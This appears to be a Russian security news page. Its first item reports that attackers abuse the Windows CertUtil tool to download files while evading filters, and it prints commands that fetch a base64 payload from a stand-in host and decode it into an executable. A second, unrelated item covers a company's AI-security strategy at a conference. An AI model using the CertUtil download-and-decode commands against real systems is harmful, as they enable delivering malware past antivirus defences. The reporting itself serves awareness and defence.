CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

Эксперты в области безопасности обеспокоены использованием киберпреступниками встроенной в Windows программы CertUtil во вредоносных целях. CertUtil предназначена для управления сертификатами в Windows, с помощью этой программы вы можете устанавливать, создавать резервную копию, удалять и управлять хранилищами сертификатов в Windows.

Одной из особенностей CertUtil является возможность загрузить сертификат или любой другой файл по удаленному URL-адресу, сохранив его в виде локального файла. Для этого используется следующий синтаксис: «certutil.exe -urlcache -split -f [URL] output.file».

Еще в 2017 году исследователь Кейси Смит в Twitter выразил обеспокоенность тем, что этот метод можно использовать для загрузки вредоносных программ.

Опасения Смита подтвердились, так как недавно обнаруженный троян с марта этого года использует этот метод для загрузки различных пакетных файлов и сценариев на зараженный компьютер.

В качестве преимущества этого механизма загрузки вредоносных файлов эксперты называют возможность обойти различные фильтры, которые бы не позволили сделать это любой другой программе.

Ксавье Мертенс, консультант по вопросам безопасности, опубликовал свою версию использования CertUtil для загрузки злонамеренного содержимого. Чтобы параллельно обойти антивирусные сканеры, Мертенс предлагает кодировать файл при помощи base64, что позволит представить его как безобидный текст.

После загрузки текстового файла команда «certutil.exe -decode» может использоваться для декодирования файла в исполняемый:

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe

Более того, некоторые специалисты сообщают о том, что такой метод уже используется киберпреступными группами.

ГК «Солар» взяла курс на защиту искусственного интеллекта

На ЦИПР-2026 группа компаний «Солар» обозначила новый стратегический фокус — развитие решений для безопасности искусственного интеллекта. Компания выступила технологическим партнёром конференции по информационной безопасности и сосредоточила свою программу вокруг темы ИИ, его внедрения в бизнес и связанных с этим киберрисков.

По данным совместного исследования «Солара», Б1, Ассоциации ФинТех и HiveTrace, 60% российских компаний, внедряющих ИИ в бизнес-процессы, не уверены в защищённости таких решений.

Среди основных рисков участники опроса называют утечки данных, галлюцинации моделей, компрометацию источников данных и баз знаний, а также использование ИИ злоумышленниками для автоматизации атак, генерации вредоносного кода и создания дипфейков.

В «Соларе» считают, что вслед за рынком ИИ будет развиваться и рынок защиты ИИ. Компания планирует строить платформенный подход к контролю ИИ-трафика, безопасному использованию нейросетей сотрудниками, защите от утечек, Data Poisoning и рисков, связанных с ИИ-агентами.

Отдельно на ЦИПР обсуждали практические кейсы внедрения ИИ. В партнёрской сессии «Солара» участвовали представители «Ростелекома», «Делимобиля», Альфа-Банка, «АльфаСтрахования», ТМК и «Циана». Компании рассказывали, как используют ИИ в контакт-центрах, разработке, аналитике, страховании, промышленности, модерации и клиентских сервисах.

«Солар» также отвечал за безопасность веб-ресурсов ЦИПР. Перед мероприятием специалисты провели анализ инфраструктуры, а в дни конференции центр Solar JSOC круглосуточно мониторил события и отражал атаки, в том числе с использованием ИИ.

Кроме того, на площадке ЦИПР компания подписала соглашения о сотрудничестве с Т1, группой «Астра», ТМК, «АЛМИ Партнер», «1С-Битрикс» и нижегородским кампусом НИУ ВШЭ.

RSS: Новости на портале Anti-Malware.ru